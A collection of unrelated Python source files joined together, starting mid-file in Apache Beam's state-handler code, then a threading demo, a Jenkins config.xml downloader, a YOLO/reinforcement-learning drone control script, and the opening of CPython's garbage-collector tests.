# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
raise NotImplementedError(type(self))
@abc.abstractmethod
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
raise NotImplementedError(type(self))
@abc.abstractmethod
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def done(self):
# type: () -> None
raise NotImplementedError(type(self))
class ThrowingStateHandler(CachingStateHandler):
"""A caching state handler that errors on any requests."""
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor '
'for bundle id %s.' % bundle_id)
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def done(self):
# type: () -> None
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor.')
class GrpcStateHandler(StateHandler):
_DONE = Sentinel.sentinel
def __init__(self, state_stub):
# type: (beam_fn_api_pb2_grpc.BeamFnStateStub) -> None
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.StateRequest, Sentinel]]
self._responses_by_id = {} # type: Dict[str, _Future]
self._last_id = 0
self._exc_info = None # type: Optional[OptExcInfo]
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
# type: (str) -> Iterator[None]
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
# type: () -> None
self._done = False
def request_iter():
# type: () -> Iterator[beam_fn_api_pb2.StateRequest]
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
# type: () -> None
try:
for response in responses:
# Popping an item from a dictionary is atomic in cPython
future = self._responses_by_id.pop(response.id)
future.set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
# type: () -> None
self._done = True
self._requests.put(self._DONE)
def get_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def append_raw(
self,
state_key, # type: Optional[beam_fn_api_pb2.StateKey]
data # type: bytes
):
# type: (...) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def clear(self, state_key):
# type: (Optional[beam_fn_api_pb2.StateKey]) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key, clear=beam_fn_api_pb2.StateClearRequest()))
def _request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> _Future[beam_fn_api_pb2.StateResponse]
request.id = self._next_id()
request.instruction_id = self._context.process_instruction_id
# Adding a new item to a dictionary is atomic in cPython
self._responses_by_id[request.id] = future = _Future[
beam_fn_api_pb2.StateResponse]()
# Request queue is thread-safe
self._requests.put(request)
return future
def _blocking_request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> beam_fn_api_pb2.StateResponse
req_future = self._request(request)
while not req_future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
if t and v and tb:
raise t(v).with_traceback(tb)
elif self._done:
raise RuntimeError()
response = req_future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
# type: () -> str
with self._lock:
# Use a lock here because this GrpcStateHandler is shared across all
# requests which have the same process bundle descriptor. State requests
# can concurrently access this section if a Runner uses threads / workers
# (aka "parallelism") to send data to this SdkHarness and its workers.
self._last_id += 1
request_id = self._last_id
return str(request_id)
class GlobalCachingStateHandler(CachingStateHandler):
""" A State handler which retrieves and caches state.
If caching is activated, caches across bundles using a supplied cache token.
If activated but no cache token is supplied, caching is done at the bundle
level.
"""
def __init__(
self,
global_state_cache, # type: StateCache
underlying_state # type: StateHandler
):
# type: (...) -> None
self._underlying = underlying_state
self._state_cache = global_state_cache
self._context = threading.local()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
if getattr(self._context, 'user_state_cache_token', None) is not None:
raise RuntimeError(
'Cache tokens already set to %s' %
self._context.user_state_cache_token)
self._context.side_input_cache_tokens = {}
user_state_cache_token = None
for cache_token_struct in cache_tokens:
if cache_token_struct.HasField("user_state"):
# There should only be one user state token present
assert not user_state_cache_token
user_state_cache_token = cache_token_struct.token
elif cache_token_struct.HasField("side_input"):
self._context.side_input_cache_tokens[
cache_token_struct.side_input.transform_id,
cache_token_struct.side_input.
side_input_id] = cache_token_struct.token
# TODO: Consider a two-level cache to avoid extra logic and locking
# for items cached at the bundle level.
self._context.bundle_cache_token = bundle_id
try:
self._state_cache.initialize_metrics()
self._context.user_state_cache_token = user_state_cache_token
with self._underlying.process_instruction_id(bundle_id):
yield
finally:
self._context.side_input_cache_tokens = {}
self._context.user_state_cache_token = None
self._context.bundle_cache_token = None
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
cache_token = self._get_cache_token(state_key)
if not cache_token:
# Cache disabled / no cache token. Can't do a lookup/store in the cache.
# Fall back to lazily materializing the state, one element at a time.
return self._lazy_iterator(state_key, coder)
# Cache lookup
cache_state_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_state_key, cache_token)
if cached_value is None:
# Cache miss, need to retrieve from the Runner
# Further size estimation or the use of the continuation token on the
# runner side could fall back to materializing one item at a time.
# https://jira.apache.org/jira/browse/BEAM-8297
materialized = cached_value = (
self._partially_cached_iterable(state_key, coder))
if isinstance(materialized, (list, self.ContinuationIterable)):
self._state_cache.put(cache_state_key, cache_token, materialized)
else:
_LOGGER.error(
"Uncacheable type %s for key %s. Not caching.",
materialized,
state_key)
return cached_value
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
# Update the cache
cache_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_key, cache_token)
# Keep in mind that the state for this key can be evicted
# while executing this function. Either read or write to the cache
# but never do both here!
if cached_value is None:
# We have never cached this key before, first retrieve state
cached_value = self.blocking_get(state_key, coder)
# Just extend the already cached value
if isinstance(cached_value, list):
# Materialize provided iterable to ensure reproducible iterations,
# here and when writing to the state handler below.
elements = list(elements)
# The state is fully cached and can be extended
cached_value.extend(elements)
elif isinstance(cached_value, self.ContinuationIterable):
# The state is too large to be fully cached (continuation token used),
# only the first part is cached, the rest if enumerated via the runner.
pass
else:
# When a corrupt value made it into the cache, we have to fail.
raise Exception("Unexpected cached value: %s" % cached_value)
# Write to state handler
out = coder_impl.create_OutputStream()
for element in elements:
coder.encode_to_stream(element, out, True)
return self._underlying.append_raw(state_key, out.get())
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
cache_key = self._convert_to_cache_key(state_key)
self._state_cache.clear(cache_key, cache_token)
return self._underlying.clear(state_key)
def done(self):
# type: () -> None
self._underlying.done()
def _lazy_iterator(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Iterator[Any]
"""Materializes the state lazily, one element at a time.
:return A generator which returns the next element if advanced.
"""
while True:
data, continuation_token = (
self._underlying.get_raw(state_key, continuation_token))
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
yield coder.decode_from_stream(input_stream, True)
if not continuation_token:
break
def _get_cache_token(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> Optional[bytes]
if not self._state_cache.is_cache_enabled():
return None
elif state_key.HasField('bag_user_state'):
if self._context.user_state_cache_token:
return self._context.user_state_cache_token
else:
return self._context.bundle_cache_token
elif state_key.WhichOneof('type').endswith('_side_input'):
side_input = getattr(state_key, state_key.WhichOneof('type'))
return self._context.side_input_cache_tokens.get(
(side_input.transform_id, side_input.side_input_id),
self._context.bundle_cache_token)
return None
def _partially_cached_iterable(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
"""Materialized the first page of data, concatenated with a lazy iterable
of the rest, if any.
"""
data, continuation_token = self._underlying.get_raw(state_key, None)
head = []
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
head.append(coder.decode_from_stream(input_stream, True))
if not continuation_token:
return head
else:
return self.ContinuationIterable(
head,
functools.partial(
self._lazy_iterator, state_key, coder, continuation_token))
class ContinuationIterable(Generic[T]):
def __init__(self, head, continue_iterator_fn):
# type: (Iterable[T], Callable[[], Iterable[T]]) -> None
self.head = head
self.continue_iterator_fn = continue_iterator_fn
def __iter__(self):
# type: () -> Iterator[T]
for item in self.head:
yield item
for item in self.continue_iterator_fn():
yield item
@staticmethod
def _convert_to_cache_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class _Future(Generic[T]):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
# type: () -> None
self._event = threading.Event()
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
return self._event.wait(timeout)
def get(self, timeout=None):
# type: (Optional[float]) -> T
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
# type: (T) -> None
self._value = value
self._event.set()
@classmethod
def done(cls):
# type: () -> _Future[None]
if not hasattr(cls, 'DONE'):
done_future = _Future[None]()
done_future.set(None)
cls.DONE = done_future # type: ignore[attr-defined]
return cls.DONE # type: ignore[attr-defined]
class KeyedDefaultDict(DefaultDict[_KT, _VT]):
if TYPE_CHECKING:
# we promise to only use a subset of what DefaultDict can do
def __init__(self, default_factory):
# type: (Callable[[_KT], _VT]) -> None
pass
def __missing__(self, key):
# type: (_KT) -> _VT
# typing: default_factory takes an arg, but the base class does not
self[key] = self.default_factory(key) # type: ignore # pylint: disable=E1137
return self[key]
|
th2.py | import threading
import time
def get_info_1(name, age, job):
time.sleep(4)
thread_name = threading.currentThread().getName()
print(f"{name} | {age} | {job} --> {thread_name}")
def get_info_2(name, age, job):
time.sleep(1)
thread_name = threading.currentThread().getName()
print(f"{name} | {age} | {job} --> {thread_name}")
# get_info('moahammad', 20, 'developer )
th_1 = threading.Thread(target=get_info_1, args=('mohammad',20, 'developer'), name='info1')
# get_info(name='mohammad', job='developer')
th_2 = threading.Thread(target=get_info_2, kwargs={'name': 'mohammad','age':19, 'job': 'ML'}, name='info2')
th_1.start()
th_2.start() |
coreclr_config_download.py | #! /usr/bin/env python
################################################################################
################################################################################
#
# Module coreclr_config_download.py
#
# Notes:
#
# Simple script to grab all of the config.xml files for jobs.
#
################################################################################
################################################################################
import argparse
import datetime
import json
import multiprocessing
import os
import re
import subprocess
import sys
import shutil
import tempfile
import threading
import time
import urllib2
import zipfile
from collections import defaultdict
from multiprocessing import Process, Queue, Pipe
################################################################################
# Argument Parser
################################################################################
description = """Simple script to grab all of the config.xml files for jobs.
Note that the api_token can either be the token or the path to
a file containing the token.
If you are having a problem with connecting try passing the, download
basline only then download the diff only after waiting a little.
Github will unforuntately rate limit OAuth connections.
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-api_token", dest="api_token", nargs='?', default=None, help="Github API Token. Can be the path to a file or string.")
parser.add_argument("-branch", dest="branch", nargs='?', default="")
parser.add_argument("-output_location", dest="output_location", nargs='?', default="output")
parser.add_argument("-sim_connections", dest="sim_connections", nargs='?', default=multiprocessing.cpu_count(), help="The amount of parrallel conntections to launch.")
parser.add_argument("-username", dest="username", nargs='?', default=None, help="Github username for the API Token.")
parser.add_argument("--baseline_only", dest="baseline_only", action="store_true", default=False, help="Download the baseline config files only.")
parser.add_argument("--diff_only", dest="diff_only", action="store_true", default=False, help="Download the diff config files only.")
################################################################################
# Classes
################################################################################
class HttpBasic403AuthorizationHandler(urllib2.HTTPBasicAuthHandler):
"""Basic authorization hander to help with jenkins authorization
"""
def http_error_403(self, request, handle, code, message, headers):
page = request.get_full_url()
host = request.get_host()
realm = None
return self.retry_http_basic_auth(host, request, realm)
class AuthenticatWithGithubApiToken:
"""Class to abstract connecting to jenkins via an authenticated github token
"""
def __init__(self, username, api_token):
self.username = username
self.api_token = api_token
self.auth_handler = None
def authenticate(self):
"""Authenticate when we receive a error 403 response.
Args:
None
Returns:
None
Notes:
Can only be called once.
"""
# Make sure we are only authenticating once
assert self.auth_handler is None
# Create and install the 403 handler
self.auth_handler = HttpBasic403AuthorizationHandler()
opener = urllib2.build_opener(self.auth_handler)
urllib2.install_opener(opener)
# Note at this point the opener is installed. However,
# there still needs to be an authentication
url = "https://ci.dot.net"
self.auth_handler.add_password(realm=None, uri=url, user=self.username, passwd=self.api_token)
# Try a quick connection
auth_url = "%s/configure" % url
try:
result = urllib2.urlopen(auth_url)
assert result.code == 200
except urllib2.HTTPError, error:
assert error.code != 401, 'Error: api-token was rejected.'
# Else this was a generic error related to sending the HttpRequest
raise error
class Job:
"""Class to abstract a jenkins job
"""
def __init__(self, job_name, job_url):
self.job_name = job_name
self.job_url = job_url
def get_config_file(self, output_location):
""" For a job get the config file.
Args:
None
Returns:
config_xml (str): config.xml contents.
"""
location = os.path.join(output_location, "%s.xml" % self.job_name)
# We may be redownloading because the download was interupted.
# skip this file because we already have a copy.
if os.path.isfile(location):
print "Skipping: %s.xml. Item exists. If this is unexpected please delete the output folder." % self.job_name
config_xml = None
with open(location) as file_handle:
config_xml = file_handle.read().strip()
return config_xml
url = "%sconfig.xml" % self.job_url
connection = urllib2.urlopen(url)
config_xml = connection.read()
connection.close()
return config_xml
def write_config_file(self, output_location, config_xml):
""" Write the config xml output for a job.
Args:
output_location (str): Must be a valid output folder
Returns
None
Notes:
The file will be named <job_name>.xml
"""
assert os.path.isdir(output_location)
path = os.path.join(output_location, "%s.xml" % self.job_name)
with open(path, 'w') as file_handle:
file_handle.write(config_xml)
################################################################################
# Helper Functions
################################################################################
def get_jobs_from_json(json_obj):
""" Given a jenkins api json string return the list of jobs
Args:
json (json_obj): json returned from a jenkins api call.
Returns:
jobs ([Job]): jobs that jenkins currently has
"""
job_list = json_obj["jobs"]
invalid_job_folders = ["GenPRTest"]
new_job_list = []
for job in job_list:
if "Folder" in job["_class"] and job["name"] not in invalid_job_folders:
new_job_list += get_jobs_from_json(read_api("%sapi/json" % job["url"]))
else:
new_job_list.append(Job(job["name"], job["url"]))
return new_job_list
def read_api(url):
""" Given a valid jenkins api url read the json returned
Args:
url (str): url to read. Must be a valid jenkins api url
Returns:
json (json_obj): json read from the connection
"""
connection = urllib2.urlopen(url)
json_str = connection.read()
connection.close()
return json.loads(json_str)
def main(args):
api_token = args.api_token
branch = args.branch
output_location = args.output_location
sim_connections = args.sim_connections
username = args.username
baseline_only = args.baseline_only
diff_only = args.diff_only
valid_branches = ["master",
"release_1.0.0",
"release_1.1.0",
"release_2.0.0",
"dev_unix_test_workflow"]
assert branch in valid_branches, "Error branch: %s is invalid." % branch
assert username is not None, "Error username expected."
assert api_token is not None, "Error a valid api token is required."
assert (baseline_only and diff_only) is False, "Error, both baseline only and diff only cannot be set."
if os.path.isfile(api_token):
with open(api_token) as file_handle:
api_token = file_handle.read().strip()
if not os.path.isdir(output_location):
os.mkdir(output_location)
authenticator = AuthenticatWithGithubApiToken(username, api_token)
authenticator.authenticate()
step = int(sim_connections)
old_output_location = os.path.join(output_location, "base")
new_output_location = os.path.join(output_location, "diff")
main_rest_url = "https://ci.dot.net/job/dotnet_coreclr/job/%s/api/json" % branch
prtest_url = "https://ci.dot.net/job/dotnet_coreclr/job/%s/job/GenPRTest/api/json" % branch
locations = [main_rest_url, prtest_url]
outputs = [old_output_location, new_output_location]
if baseline_only is True:
locations = [main_rest_url]
outputs = [old_output_location]
elif diff_only is True:
locations = [prtest_url]
outputs = [new_output_location]
for index, output_dir in enumerate(outputs):
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
jobs = get_jobs_from_json(read_api(locations[index]))
def write_config_file(output_location, job):
"""Worker function for the multithreading
"""
job.write_config_file(output_location, job.get_config_file(output_location))
def join_threads():
""" Simple method to join all threads
"""
main_thread = threading.currentThread()
for thread_handle in threading.enumerate():
if thread_handle is main_thread:
continue
thread_handle.join()
for index, job in enumerate(jobs):
print "Starting: %s [%d of %d]" % (job.job_name, index + 1, len(jobs))
thread_handle = threading.Thread(target=write_config_file, args=(output_dir, job))
thread_handle.setDaemon(True)
thread_handle.start()
# Join every step
if index % step == 0:
join_threads()
join_threads()
################################################################################
# __main__ (entry point)
################################################################################
if __name__ == "__main__":
main(parser.parse_args(sys.argv[1:])) |
script.py | import pygame
import cv2
import numpy as np
import time
import os
from mydronesdk.ddpg_yolo_control.yolo.utils import get_yolo_boxes
from mydronesdk.ddpg_yolo_control.yolo.bbox import draw_boxes
from keras.models import load_model
import json
from mydronesdk.ddpg_yolo_control.rl_airsim.gym_airsim_env import AirsimEnv
from mydronesdk.ddpg_yolo_control.rl_airsim.ddpg_train import RLAgent
import threading
import copy
from mydronesdk.my_drone_sdk import MyDroneSDK
import sys
# Speed of the drone
S = 0.4
# Frames per second of the pygame window display
# A low number also results in input lag, as input information is processed once per frame.
FPS = 15
###############################
# Set some parameter
###############################
net_h, net_w = 416, 416 # 416, 416 # a multiple of 32, the smaller the faster
obj_thresh, nms_thresh = 0.6, 0.45
frame_height, frame_width, frame_channel = 720, 960, 3
z_lower, z_upper = 0, 1200
step_duration = 2
save_id = 1
vel_scale = 0.55
left_right_velocity_rate = 1 # 0.8
forward_backward_velocity_rate = 1
up_down_velocity_rate = 0.6
yaw_velocity_rate = 70
class FrontEnd:
""" Maintains the Tello display and moves it through the keyboard keys.
Press escape key to quit.
The controls are:
- T: Takeoff
- L: Land
- Arrow keys: Forward, backward, left and right.
- A and D: Counter clockwise and clockwise rotations (yaw)
- W and S: Up and down.
"""
def __init__(self,drone):
# Init pygame
pygame.init()
# Creat pygame window
pygame.display.set_caption("Tello video stream")
self.screen = pygame.display.set_mode([frame_width, frame_height])
# Init Tello object that interacts with the Tello drone
self.drone = drone
# Drone velocities between -100~100
self.for_back_velocity = 0
self.left_right_velocity = 0
self.up_down_velocity = 0
self.yaw_velocity = 0
# self.speed = 10
self.send_rc_control = False
self.should_stop=False
self.manual_flag=True
# create update timer
pygame.time.set_timer(pygame.USEREVENT + 1, 1000 // FPS)
def run(self):
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(f'D:\PYCHARMWORKSPACE\PyOneDark_Qt_Widgets_Modern_GUI-master\property/output{save_id}.avi', fourcc, FPS, (frame_width, frame_height))
frame_read = self.drone.video_receiver
while not self.should_stop:
for event in pygame.event.get():
if self.manual_flag:
if event.type == pygame.USEREVENT + 1:
self.update()
elif event.type == pygame.QUIT:
self.should_stop = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.should_stop = True
elif event.key == pygame.K_SPACE:
self.manual_flag=False
else:
self.keydown(event.key)
elif event.type == pygame.KEYUP:
self.keyup(event.key)
else:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
self.manual_flag = True
if frame_read.status!=2:
continue
self.screen.fill([0, 0, 0])
try:
frame = cv2.resize(frame_read.frame,(frame_width,frame_height))
except BaseException as e:
continue
out.write(frame)
# text = "Battery: {}%".format(self.tello.get_battery())
# cv2.putText(frame, text, (5, 720 - 5),
# cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = np.rot90(frame)
frame = np.flipud(frame)
frame = pygame.surfarray.make_surface(frame)
self.screen.blit(frame, (0, 0))
pygame.display.update()
time.sleep(1 / FPS)
# Call it always before finishing. To deallocate resources.
out.release()
pygame.quit()
print("ddpg_yolo_control_script ended.")
def keydown(self, key):
""" Update velocities based on key pressed
Arguments:
key: pygame key
"""
if key == pygame.K_UP: # set forward velocity
self.for_back_velocity = S
elif key == pygame.K_DOWN: # set backward velocity
self.for_back_velocity = -S
elif key == pygame.K_LEFT: # set left velocity
self.left_right_velocity = -S
elif key == pygame.K_RIGHT: # set right velocity
self.left_right_velocity = S
elif key == pygame.K_w: # set up velocity
self.up_down_velocity = S
elif key == pygame.K_s: # set down velocity
self.up_down_velocity = -S
elif key == pygame.K_a: # set yaw counter clockwise velocity
self.yaw_velocity = -S*50
elif key == pygame.K_d: # set yaw clockwise velocity
self.yaw_velocity = S*50
# elif key == pygame.K_h: # set yaw clockwise velocity
# print(self.tello.get_height())
def keyup(self, key):
""" Update velocities based on key released
Arguments:
key: pygame key
"""
if key == pygame.K_UP or key == pygame.K_DOWN: # set zero forward/backward velocity
self.for_back_velocity = 0
elif key == pygame.K_LEFT or key == pygame.K_RIGHT: # set zero left/right velocity
self.left_right_velocity = 0
elif key == pygame.K_w or key == pygame.K_s: # set zero up/down velocity
self.up_down_velocity = 0
elif key == pygame.K_a or key == pygame.K_d: # set zero yaw velocity
self.yaw_velocity = 0
elif key == pygame.K_t: # takeoff
self.drone.takeoff()
self.send_rc_control = True
elif key == pygame.K_l: # land
self.drone.land()
self.send_rc_control = False
elif key == pygame.K_p: # prepare
try:
self.drone.prepare()
except Exception as e:
pass
#else:
self.send_rc_control = True
def update(self):
""" Update routine. Send velocities to Tello."""
if self.send_rc_control:
# self.tello.send_rc_control(self.left_right_velocity, self.for_back_velocity,
# self.up_down_velocity, self.yaw_velocity)
self.drone.set_velocity_body(self.left_right_velocity, self.for_back_velocity,
self.up_down_velocity, self.yaw_velocity)
def box_thread(drone,front_end,target_id=14):
"""box detection thread function. This function receives a frame every 200ms and return corresponding box and actions in a queue
input : frame_glob (416x416)
output : put box and actions in queue.
"""
# setting config path for YOLO config
config_path = 'D:\PYCHARMWORKSPACE\PyOneDark_Qt_Widgets_Modern_GUI-master\mydronesdk/ddpg_yolo_control/yolo_assets/config_voc.json'
with open(config_path) as config_buffer:
config = json.load(config_buffer)
###############################
# Load the model for YOLO detection
###############################
os.environ['CUDA_VISIBLE_DEVICES'] = config['train']['gpus']
infer_model = load_model(config['train']['saved_weights_name'])
###############################
# Load the model for RL agent
###############################
env = AirsimEnv(False, sim_flag=False)
agent = RLAgent(env)
ENV_NAME = 'drone'
agent.agent.load_weights('D:/PYCHARMWORKSPACE/PyOneDark_Qt_Widgets_Modern_GUI-master/mydronesdk/ddpg_yolo_control/rl_airsim/ddpg_{}_weights_5.h5f'.format(ENV_NAME))
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(f'D:\PYCHARMWORKSPACE\PyOneDark_Qt_Widgets_Modern_GUI-master\property/output_box{save_id}.avi', fourcc, 2, (frame_width, frame_height))
print('YOLO detection ok')
while not front_end.should_stop:
try:
frame_glob=drone.video_receiver.frame
if frame_glob is not None:
frame = cv2.resize(frame_glob,(frame_width,frame_height))
# call prection function of YOLO algorithm to return boxes
boxes = \
get_yolo_boxes(infer_model, [frame],
net_h, net_w, config['model']['anchors'], obj_thresh, nms_thresh)[0]
# print('YOLO detection ok')
state = np.zeros(5)
for box in boxes:
if box.get_label() == target_id: # filter on the person class (ID =14)
print("reward:", env.reward([box.xmin, box.xmax, box.ymin, box.ymax]))
state = np.array([box.xmin / frame_width, box.xmax / frame_width,
box.ymin / frame_height, box.ymax / frame_height, 0])
draw_boxes(frame, [box], config['model']['labels'], obj_thresh)
break
# frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# frame = np.rot90(frame)
# frame = np.flipud(frame)
cv2.imshow("show", frame)
cv2.waitKey(1)
# state[4]=(tello.get_height()-z_lower) / (z_upper - z_lower)
state[4] = (300 - z_lower) / (z_upper - z_lower)
action = agent.agent.my_forward_for_test(state) * vel_scale
#print("action:", action)
left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity = action
# tello.send_rc_control(round(-left_right_velocity*left_right_velocity_rate),
# round(forward_backward_velocity*forward_backward_velocity_rate),
# round(up_down_velocity *up_down_velocity_rate),
# round(yaw_velocity / vel_scale * yaw_velocity_rate))
if not front_end.manual_flag:
drone.set_velocity_body(-left_right_velocity*left_right_velocity_rate,
forward_backward_velocity*forward_backward_velocity_rate,
up_down_velocity *up_down_velocity_rate,
yaw_velocity / vel_scale * yaw_velocity_rate)
timer = time.time()
text = f"{-left_right_velocity * left_right_velocity_rate}, " \
f"{forward_backward_velocity * forward_backward_velocity_rate}, " \
f"{up_down_velocity * up_down_velocity_rate}, {yaw_velocity / vel_scale * yaw_velocity_rate}"
cv2.putText(frame, text, (50, 720 - 5),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
out.write(frame)
while time.time() - timer < step_duration and not front_end.manual_flag:
time.sleep(1 / FPS)
# tello.send_rc_control(0, 0, 0, 0)
if not front_end.manual_flag:
drone.set_velocity_body(0,0,0,0)
#frame_glob = None
except Exception as e:
# print("Exception: "+e.__str__())
pass
out.release()
print("box_thread ended.")
def script(command_sender,video_receiver):
drone=MyDroneSDK("1",command_sender, video_receiver)
frontend = FrontEnd(drone)
thread_box = threading.Thread(target=box_thread, args=(drone,frontend,1))
# thread_box.setDaemon(True)
thread_box.start()
# time.sleep(5)
# run frontend
frontend.run()
if __name__=="__main__":
pass |
test_gc.py | import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr)
import sys
import time
import gc
import weakref
try:
import threading
except ImportError:
threading = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __del__(self):
pass
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
